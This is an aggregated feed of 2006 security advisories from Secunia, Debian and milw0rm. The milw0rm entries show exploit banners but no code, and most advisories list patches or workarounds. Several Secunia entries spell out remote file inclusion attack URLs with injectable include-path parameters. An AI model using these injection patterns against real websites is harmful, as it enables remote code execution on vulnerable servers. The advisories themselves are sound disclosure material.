http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_m68k.deb
Size/MD5 checksum: 33066 3992b0cab96e959ecea687899f8ef05f
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_m68k.deb
Size/MD5 checksum: 82094 b13852c78fa4f46ff993f3c1e98680dc

Big endian MIPS architecture:

http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_mips.deb
Size/MD5 checksum: 11943796 cb93a2f2fc4dd706defeaea3c18a6b6f
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_mips.deb
Size/MD5 checksum: 3278794 9acf4f9583972ed1fe2d453e8330233b
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_mips.deb
Size/MD5 checksum: 147496 07472047d17dabe204412c357bb21169
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_mips.deb
Size/MD5 checksum: 33042 b7f0219fc847c1a52b3336aea10b1523
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_mips.deb
Size/MD5 checksum: 84296 de6058169bdcaac13f4e44e50d86fcfa

Little endian MIPS architecture:

http://security.debian.org/pool/updat...bird_1.0.2-2.sarge1.0.8b.1_mipsel.deb
Size/MD5 checksum: 11811180 7a90700b755f8a9628743c00c5658e01
http://security.debian.org/pool/updat...-dev_1.0.2-2.sarge1.0.8b.1_mipsel.deb
Size/MD5 checksum: 3279738 b7599c5e7cb743cfe02f60402beeef4c
http://security.debian.org/pool/updat...ctor_1.0.2-2.sarge1.0.8b.1_mipsel.deb
Size/MD5 checksum: 147050 e648ba4dcabf8cd85415d259d19f9dc5
http://security.debian.org/pool/updat...line_1.0.2-2.sarge1.0.8b.1_mipsel.deb
Size/MD5 checksum: 33034 9892f5d7755b7b013b825acf7d239b9a
http://security.debian.org/pool/updat...find_1.0.2-2.sarge1.0.8b.1_mipsel.deb
Size/MD5 checksum: 84184 08802c45278f5d135118b15c261d60ff

PowerPC architecture:

http://security.debian.org/pool/updat...ird_1.0.2-2.sarge1.0.8b.1_powerpc.deb
Size/MD5 checksum: 10908332 b4899f52b0b1555eef1a52e29f7ccff0
http://security.debian.org/pool/updat...dev_1.0.2-2.sarge1.0.8b.1_powerpc.deb
Size/MD5 checksum: 3269376 138a349de0a5a33317fb12e38fa7048d
http://security.debian.org/pool/updat...tor_1.0.2-2.sarge1.0.8b.1_powerpc.deb
Size/MD5 checksum: 144570 8a5fbabc69454577f95fca69d6922183
http://security.debian.org/pool/updat...ine_1.0.2-2.sarge1.0.8b.1_powerpc.deb
Size/MD5 checksum: 33046 eab66e527293d35eeec5a2aa21e34988
http://security.debian.org/pool/updat...ind_1.0.2-2.sarge1.0.8b.1_powerpc.deb
Size/MD5 checksum: 80956 110bbacc7e5b85d32966e8b095d18e49

IBM S/390 architecture:

http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_s390.deb
Size/MD5 checksum: 12701528 e77cc46c7784b4678e00158c4067fb13
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_s390.deb
Size/MD5 checksum: 3279814 9f614f520b7d24b584b4dfdde4d6856c
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_s390.deb
Size/MD5 checksum: 150872 8ec4f9059a17b2e75afd8cb472dfd7d4
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_s390.deb
Size/MD5 checksum: 33030 1a9dd5360add1b5c7d3940e44efc72f4
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_s390.deb
Size/MD5 checksum: 88798 c1fc3eda5995f50df821da0913447ffa

Sun Sparc architecture:

http://security.debian.org/pool/updat...rbird_1.0.2-2.sarge1.0.8b.1_sparc.deb
Size/MD5 checksum: 11176418 d9291799bae4c157fe7f0a9dd86ebcf4
http://security.debian.org/pool/updat...d-dev_1.0.2-2.sarge1.0.8b.1_sparc.deb
Size/MD5 checksum: 3275086 2a78bb9f76059b034dd1232cdd82dee6
http://security.debian.org/pool/updat...ector_1.0.2-2.sarge1.0.8b.1_sparc.deb
Size/MD5 checksum: 144214 0f03b8b13d7cb6ae6c0eebbec1da6d2b
http://security.debian.org/pool/updat...fline_1.0.2-2.sarge1.0.8b.1_sparc.deb
Size/MD5 checksum: 33056 4b9864766f12b2328b9e6fdfd98a4d0e
http://security.debian.org/pool/updat...dfind_1.0.2-2.sarge1.0.8b.1_sparc.deb
Size/MD5 checksum: 82648 c02d426a3ab8f7e704f946d0b0fee7c8

-- Debian GNU/Linux unstable alias sid --

Fixed in version 1.5.0.5-1.

Original Advisory:
http://www.us.debian.org/security/2006/dsa-1159

Other References:
SA19873:
http://secunia.com/advisories/19873/

SA20382:
http://secunia.com/advisories/20382/

SA21228:
http://secunia.com/advisories/21228/


]]> http://secunia.com/advisories/21654/ Mon, 28 Aug 2006 08:11:09 -0400 Release Date: 2006-08-28

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Ay System WCS 2.x


Description:
SHiKaA has discovered some vulnerabilities in Ay System WCS, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "path[ShowProcessHandle]" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Examples:
http://[host]/manage/template/standard/main.php?path[ShowProcessHandle]=[file]
http://[host]/manage/template/standard/home.php?path[ShowProcessHandle]=[file]
http://[host]/manage/template/standard/impressum.php?path[ShowProcessHandle]=[file]

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 2.6. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
SHiKaA

Original Advisory:
http://milw0rm.com/exploits/2263]]> http://secunia.com/advisories/21661/ Mon, 28 Aug 2006 08:10:25 -0400 Release Date: 2006-08-28

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: AlberT-EasySite 1.x


Description:
Kacper has reported a vulnerability in AlberT-EasySite, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "PSA_PATH" parameter in AES/modules/auth/phpsecurityadmin/include/logout.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been reported in version 1.0a5. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

Provided and/or discovered by:
Kacper

Original Advisory:
http://milw0rm.com/exploits/2260
]]> http://secunia.com/advisories/21651/ Mon, 28 Aug 2006 08:09:54 -0400 "In what prosecutors are calling 'the ultimate case', a Florida man has been sentenced to six years in prison for selling illegal copies of computer programs. From the article: 'Danny Ferrer, of Lakeland, Fla., pleaded guilty in June to conspiracy and copyright infringement charges after an FBI investigation of his Web site, BuysUSA.com. Ferrer also was ordered to pay more than $4.1 million in restitution to software makers Adobe Systems Inc., Autodesk, and Macromedia Inc.' The judge ordered that items he bought with the money, including airplanes, a Lamborghini and other cars, be sold off to pay for the restitution."<br> http://yro.slashdot.org/article.pl?sid=06/08/25/1724249&from=rss Fri, 25 Aug 2006 16:17:38 -0400 #+
#- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Phaos <= 0.9.2 basename() Remote Command Execution Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Phaos v. 0.9.2
#- [Script site: http://sourceforge.net/projects/phaosrpg/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Find by: Kacper (a.k.a Rahim)
#+
#- Contact: kacper1964@yahoo.pl
#- or
#- http://www.devilteam.yum.pl/
#- and
#- http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
#-
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Z Dedykacja dla osoby,
#- bez ktorej nie mogl bym zyc...
#- K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]]> http://www.milw0rm.com/exploits/2253 Fri, 25 Aug 2006 16:16:15 -0400
##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################]]> http://www.milw0rm.com/exploits/2254 Fri, 25 Aug 2006 16:15:23 -0400 Release Date: 2006-08-25

Critical:
Less critical
Impact: Privilege escalation
Where: Local system
Solution Status: Vendor Patch

OS: AIX 5.x


Description:
A security issue has been reported in AIX, which can be exploited by malicious, local users to gain escalated privileges.

The problem is that mkvg invokes various other programs (chdev, mkboot, varyonvg, and varyoffvg) without absolute pathnames. This may be exploited to execute arbitrary code with the privileges of a user running mkvg by placing a malicious program in the path.

Solution:
Apply APARs.

AIX 5.3:
Apply APAR IY88699.

AIX 5.2:
Apply APAR IY88737.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
IBM:
http://www-1.ibm.com/support/docview.wss?uid=isg1IY88699
http://www-1.ibm.com/support/docview.wss?uid=isg1IY88737]]> http://secunia.com/advisories/21620/ Fri, 25 Aug 2006 16:14:35 -0400 Release Date: 2006-08-25

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SGI Advanced Linux Environment 3

CVE reference: CVE-2006-3459 (Secunia mirror)
CVE-2006-3460 (Secunia mirror)
CVE-2006-3461 (Secunia mirror)
CVE-2006-3462 (Secunia mirror)
CVE-2006-3463 (Secunia mirror)
CVE-2006-3464 (Secunia mirror)
CVE-2006-3465 (Secunia mirror)
CVE-2006-3627 (Secunia mirror)
CVE-2006-3628 (Secunia mirror)
CVE-2006-3629 (Secunia mirror)
CVE-2006-3630 (Secunia mirror)
CVE-2006-3631 (Secunia mirror)
CVE-2006-3632 (Secunia mirror)
CVE-2006-3694 (Secunia mirror)
CVE-2006-3746 (Secunia mirror)
CVE-2006-3918 (Secunia mirror)


Description:
SGI has issued a patch for SGI Advanced Linux Environment. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.

For more information:
SA21236
SA21290
SA21300
SA21399
SA21488

Solution:
Apply patch 10326 for SGI ProPack 3 Service Pack 6.
http://support.sgi.com/

Original Advisory:
ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc

Other References:
SA21236:
http://secunia.com/advisories/21236/

SA21290:
http://secunia.com/advisories/21290/

SA21300:
http://secunia.com/advisories/21300/

SA21399:
http://secunia.com/advisories/21399/

SA21488:
http://secunia.com/advisories/21488/]]> http://secunia.com/advisories/21598/ Fri, 25 Aug 2006 16:14:03 -0400
Secunia Advisory: SA21622
Release Date: 2006-08-25

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
Exposure of sensitive information
DoS
System access
Where: From remote
Solution Status: Vendor Workaround

OS: Sun Solaris 10
Sun Solaris 8
Sun Solaris 9


Description:
Sun has acknowledged some vulnerabilities in mozilla for Sun Solaris. These can be exploited by malicious people to bypass certain security restrictions, disclose sensitive information, conduct cross-site scripting and phishing attacks, and compromise a vulnerable system.

For more information:
SA17944
SA18700
SA18703
SA19649

Solution:
Apply patches.

-- SPARC Platform --

Mozilla 1.7 for (Solaris 10):
Apply patch 119115-19 or later.

-- x86 Platform --

Mozilla 1.7 for (Solaris 10):
Apply patch 119116-19 or later.

A final resolution is pending completion for other versions. See the vendor's advisory for various workarounds.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102550-1

Other References:
SA19649:
http://secunia.com/advisories/19649/

SA17944:
http://secunia.com/advisories/17944/

SA18700:
http://secunia.com/advisories/18700/

SA18703:
http://secunia.com/advisories/18703/


]]> http://secunia.com/advisories/21622/ Fri, 25 Aug 2006 16:13:26 -0400 Release Date: 2006-08-25

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: phpCOIN 1.x


Description:
Timq has discovered some vulnerabilities in phpCOIN, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "_CCFG[_PKG_PATH_INCL]" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Examples:
http://[host]/coin_includes/api.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/common.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/core.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/custom.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/db.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/redirect.php?_CCFG[_PKG_PATH_INCL]=[file]
http://[host]/coin_includes/session_set.php?_CCFG[_PKG_PATH_INCL]=[file]

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 1.2.3. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Timq

Original Advisory:
http://milw0rm.com/exploits/2254


]]> http://secunia.com/advisories/21624/ Fri, 25 Aug 2006 16:12:53 -0400 Workaround for sluggishness http://isc.sans.org/diary.php?storyid=1633 Thu, 24 Aug 2006 10:25:04 -0400
pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################]]> http://www.milw0rm.com/exploits/2249 Thu, 24 Aug 2006 09:45:04 -0400 # Method found and exploit scripted by nukedx<br> # Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com<br> # Original advisory can be found at: http://www.nukedx.com/?viewdoc=47<br> # <br> # Integramod Portal <= 2.x Remote Command Execution Exploit<br> # <br> # This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data ><br> # http://www.milw0rm.com/exploits/2250 Thu, 24 Aug 2006 09:44:28 -0400 If you haven't heard of Gromozon, you haven't lived. Then again, you probably haven't had your PC french-fried yet either. It's a horrendously nasty hack doing the rounds - there's Adware, there's Rootkits, there's...oh God, all kinds of really hideous stuff in there. You really should do yourself a favour and read this document. It's a PDF, fact fans. http://www.vitalsecurity.org/2006/08/gromozon-rootkit-what-you-need-to-know.html Thu, 24 Aug 2006 09:38:52 -0400 Release Date: 2006-08-24

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: VistaBB 2.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Mustafa Can Bjorn has discovered some vulnerabilities in VistaBB, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "phpbb_root_path" parameter in includes/functions_mod_user.php and includes/functions_portal.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 2.0.33. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Mustafa Can Bjorn

Original Advisory:
http://www.nukedx.com/?viewdoc=48
]]> http://secunia.com/advisories/21602/ Thu, 24 Aug 2006 09:37:51 -0400 Release Date: 2006-08-24

Critical:
Moderately critical
Impact: Security Bypass
Where: From remote
Solution Status: Vendor Patch

OS: Cisco Adaptive Security Appliance (ASA) 7.x
Cisco PIX 7.x

Software: Cisco Firewall Services Module (FWSM) 1.x
Cisco Firewall Services Module (FWSM) 2.x
Cisco Firewall Services Module (FWSM) 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
A security issue has been reported in various Cisco Firewall products, which may allow malicious people to bypass certain security restrictions.

The problem is caused due to an error resulting in certain passwords (EXEC password, passwords of locally defined usernames, and the enable password in the start-up configuration) being unintentionally changed to a non-random value without user intervention.

The error may happen during a software crash or multiple users configuring a device at the same time.

This may result in users being locked out or lead to unauthorised access to an affected device.

Solution:
Update to a fixed version (see the vendor's advisory for details).

Provided and/or discovered by:
The vendor credits Terje Bless, Helse Nord IKT.
]]> http://secunia.com/advisories/21616/ Thu, 24 Aug 2006 09:37:20 -0400 Release Date: 2006-08-24

Critical:
Less critical
Impact: Security Bypass
Where: From local network
Solution Status: Vendor Patch

OS: Cisco VPN 3000 Concentrator

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Two vulnerabilities have been reported in Cisco VPN 3000 Concentrator, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerabilities are caused due to unspecified errors when using FTP as a management protocol and can be exploited to run the "CWD", "MKD", "CDUP", "RNFR", "SIZE", and "RMD" commands without being authenticated. This can e.g. be exploited to delete configuration files and certificates on the device.

Successful exploitation requires that the device has been configured to use FTP as a management protocol (default setting).

The vulnerabilities affect models 3005, 3015, 3020, 3030, 3060, and 3080 running the following versions:
* Any version prior to 4.1
* Any 4.1.x version prior to, and including, 4.1(7)L
* Any 4.7.x version prior to, and including, 4.7(2)F

Solution:
Update to version 4.1(7)M or 4.7(2)G.
http://www.cisco.com/pcgi-bin/tablebuild.pl/vpn3000-3des?psrtdcat20e2

Network security best practises recommend restricting access to the FTP service (or disabling it if not needed to manage the VPN 3000 concentrator).

Provided and/or discovered by:
The vendor credits NCC Group.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml]]> http://secunia.com/advisories/21617/ Thu, 24 Aug 2006 09:36:49 -0400 Release Date: 2006-08-24

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: Wireshark (formerly Ethereal) 0.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Some vulnerabilities have been reported in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

1) An unspecified error within the SCSI protocol dissector can be exploited to crash the application.

2) Off-by-one errors exist in the IPSec ESP preference parser. Successful exploitation requires that Wireshark has been compiled with ESP decryption support.

3) Errors in the DHCP dissector and potentially other protocol dissectors can be exploited to crash Wireshark due to a bug in Glib. This only affects the Windows version.

4) An error within the Q.2391 dissector can be exploited to cause a DoS due to memory consumption.

Successful exploitation of the vulnerabilities may cause Wireshark to stop responding, consume large amounts of system memory, crash, or execute arbitrary code.

Solution:
Update to version 0.99.3.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.wireshark.org/security/wnpa-sec-2006-02.html]]> http://secunia.com/advisories/21597/ Thu, 24 Aug 2006 09:36:18 -0400 ++++++++++++++++++++++++++++++++++++++++++++++++++++++<br> + +<br> + phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +<br> + +<br> + bd0rk || SOH-Crew +<br> + +<br> + Mod: http://www.phpbbhacks.com/download/2821 +<br> + +<br> ++++++++++++++++++++++++++++++++++++++++++++++++++++++ http://www.milw0rm.com/exploits/2248 Wed, 23 Aug 2006 12:08:26 -0400 #
# raptor_ucbps - information leak with Solaris /usr/ucb/ps
# Copyright (c) 2006 Marco Ivaldi
#
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow
# unprivileged local users the ability to see environment variables and their
# values for processes which belong to other users (Sun Alert ID: 102215).
#
# Absolutely nothing fancy, but it may turn out to be useful;)]]> http://www.milw0rm.com/exploits/2242 Wed, 23 Aug 2006 11:56:54 -0400 #author: tomas kempinsky<br><br> http://www.milw0rm.com/exploits/2244 Wed, 23 Aug 2006 11:56:01 -0400 --------------------------------------------------------------------------------<br> Simple Machines Forum <= 1.1.RC2 "lock"/Zend_Hash_Del_Key_Or_Index Vulnerability<br> by rgod rgod@autistici.org<br> site: http://retrogod.altervista.org<br> dork, version specific: "Powered by SMF"<br> --------------------------------------------------------------------------------<br> '); http://www.milw0rm.com/exploits/2243 Wed, 23 Aug 2006 11:55:08 -0400 MercuryBoard <= 1.1.4 "User-Agent" SQL injection / privilege escalation exploit
(php version)
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "Powered by MercuryBoard"
--------------------------------------------------------------------------------
');
/*
works regardless of php.ini settings
against MySQL> 4.1 (allowing subs)
original exploit: http://www.milw0rm.com/exploits/1058 coded by 1dt.w0lf
not working for me, so I wrote my version
vulnerability is actually unpatched...
*/]]> http://www.milw0rm.com/exploits/2247 Wed, 23 Aug 2006 11:52:34 -0400 Release Date: 2006-08-23

Critical:
Less critical
Impact: Privilege escalation
Where: Local system
Solution Status: Vendor Patch

OS: Sun Solaris 10
Sun Solaris 8
Sun Solaris 9

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Some vulnerabilities have been reported in Sun Solaris, which can be exploited by malicious, local users to gain escalated privileges.

1) An unspecified error in the default configuration of the Role-Based Access Control (RBAC) associated with the "File System Management" profile can be exploited to execute arbitrary commands with "root" privileges.

The vulnerability affects Sun Solaris 8 and 9 for both the SPARC and x86 platform.

2) An unspecified error exists in the "format" command. This allows a user, who has been granted the "File System Management" RBAC profile or similar, to write to device files with "root" privileges.

The vulnerability affects Sun Solaris 8 and 9 for both the SPARC and x86 platform.

3) A boundary error in the "format" command can be exploited to cause a buffer overflow. This allows a user, who has been granted the "File System Management" RBAC profile or similar, to execute arbitrary code with "root" privileges.

The vulnerability affects Sun Solaris 8, 9, and 10 for both the SPARC and x86 platform.

Solution:
Apply patches.

-- SPARC Platform --

Solaris 8:
Apply patch 108975-10 or later.
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-108975-10-1

Solaris 9:
Apply patch 113072-08 or later.
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-113072-08-1

Solaris 10:
Apply patch 118833-18 or later.
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-118833-18-1

-- x86 Platform --

Solaris 8:
Apply patch 108976-10 or later.
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-108976-10-1

Solaris 9:
Apply patch 114423-07 or later.
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-114423-07-1

Solaris 10:
Apply patch 118997-09 or later.
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-118997-09-1

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Sun Microsystems:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102514-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102519-1


]]> http://secunia.com/advisories/21581/ Wed, 23 Aug 2006 11:50:56 -0400 Release Date: 2006-08-23

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Workaround

Software: Microsoft Internet Explorer 6.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-3869

Description:
A vulnerability has been reported in Internet Explorer, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error when processing URLs on a website using HTTP 1.1 and compression. This can be exploited to cause a heap-based buffer overflow via an overly long URL (more than about 500 bytes).

Successful exploitation allows execution of arbitrary code when a user is e.g. tricked into visiting a malicious website.

The vulnerability affects Internet Explorer 6 SP1 on Windows 2000 and Windows XP SP1 and was introduced by the MS06-042 patches.

Solution:
The vendor recommends disabling the HTTP 1.1 protocol in Internet Explorer (see the vendor's advisory for details).

Provided and/or discovered by:
Dejan Kovacevic, Bold Internet Solutions.
Derek Soeder, eEye Digital Security.

Changelog:
2006-08-23: Added additional information.

Original Advisory:
Microsoft:
http://www.microsoft.com/technet/security/advisory/923762.mspx
http://support.microsoft.com/kb/923762/

Other References:
US-CERT VU#821156:
http://www.kb.cert.org/vuls/id/821156
]]> http://secunia.com/advisories/21557/ Wed, 23 Aug 2006 11:50:07 -0400 Release Date: 2006-08-23

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Empire CMS 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Bob Linuson has discovered a vulnerability in Empire CMS, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "check_path" parameter in e/class/CheckLevel.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local and external resources.

The vulnerability has been confirmed in version 3.7. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Bob Linuson
]]> http://secunia.com/advisories/21584/ Wed, 23 Aug 2006 11:48:17 -0400 Release Date: 2006-08-23

Critical:
Moderately critical
Impact: System access
Where: From local network
Solution Status: Vendor Patch

Software: MDaemon 8.x
MDaemon 9.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
INFIGO IS has discovered some vulnerabilities in MDaemon, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerabilities are due to boundary errors in the POP3 server and can be exploited to cause a heap-based buffer overflow by supplying an overly long string to the "USER" or "APOP" command.

Successful exploitation allows execution of arbitrary code.

The vulnerabilities have been confirmed in version 9.0.5. Prior versions may also be affected.

Solution:
Update to version 9.0.6.

Provided and/or discovered by:
Sasa Jusic and Leon Juranic, INFIGO IS

Original Advisory:
http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04]]> http://secunia.com/advisories/21595/ Wed, 23 Aug 2006 11:47:46 -0400 Release Date: 2006-08-21

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: SportsPHool 1.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Kacper has discovered a vulnerability in SportsPHool, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "mainnav" parameter in includes/layout/plain.footer.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 1.0. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Kacper

Original Advisory:
http://milw0rm.com/exploits/2227


]]> http://secunia.com/advisories/21594/ Tue, 22 Aug 2006 14:11:38 -0400 Release Date: 2006-08-22

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Dolphin 5.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-4189

Description:
A vulnerability has been discovered in Dolphin, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "dir[inc]" parameter in templates/tmpl_dfl/scripts/index.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 5.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Reported by an anonymous person.
]]> http://secunia.com/advisories/21535/ Tue, 22 Aug 2006 14:10:41 -0400 Empire CMS <=3.7 (checklevel.php) Remote File Include Vulnerability<br> Find by: Bob Linuson<br><br> http://www.milw0rm.com/exploits/2239 Tue, 22 Aug 2006 14:10:00 -0400 HPE v0.6.1 Remote File Inclusion Vulnerability http://www.milw0rm.com/exploits/2240 Tue, 22 Aug 2006 14:07:42 -0400 * $Id: raptor_sysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $
*
* raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak
* Copyright (c) 2006 Marco Ivaldi
*
* systeminfo.c for Sun Solaris allows local users to read kernel memory via
* a 0 variable count argument to the sysinfo system call, which causes a -1
* argument to be used by the copyout function. NOTE: this issue has been
* referred to as an integer overflow, but it is probably more like a
* signedness error or integer underflow (CVE-2006-3824).
*
* http://en.wikipedia.org/wiki/Pitagora_Suicchi
*
* Greets to prdelka, who also exploited this vulnerability.
*
* I should also definitely investigate the old sysinfo(2) vulnerability
* described in CVE-2003-1062, affecting Solaris/SPARC 2.6 through 9 and
* Solaris/x86 2.6 through 8... It may come in handy sooner or later;)
*]]> http://www.milw0rm.com/exploits/2241 Tue, 22 Aug 2006 13:43:39 -0400 2006-08-16 PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit
8/21/06 PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
8/21/06 PHlyMail Lite <= 3.4.4 (folderprops.php) Remote Include Vulnerability (2)
8/20/06 NES Game and NES System <= c108122 File Include Vulnerabilities
8/20/06 SportsPHool <= 1.0 (mainnav) Remote File Include Vulnerability
8/20/06 SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability
8/20/06 Shadows Rising RPG <= 0.0.5b Remote File Include Vulnerabilities
8/20/06 LBlog <= 1.05 (comments.asp) Remote SQL Injection Vulnerability
8/20/06 Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows)
8/20/06 SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit
8/19/06 Mambo cropimage Component <= 1.0 Remote File Include Vulnerability
8/19/06 interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability
8/19/06 Joomla <=1.0.10 (poll component) Arbitrary Add Votes Exploit
8/19/06 Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability
8/19/06 Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability
8/19/06 Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability
8/19/06 ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability
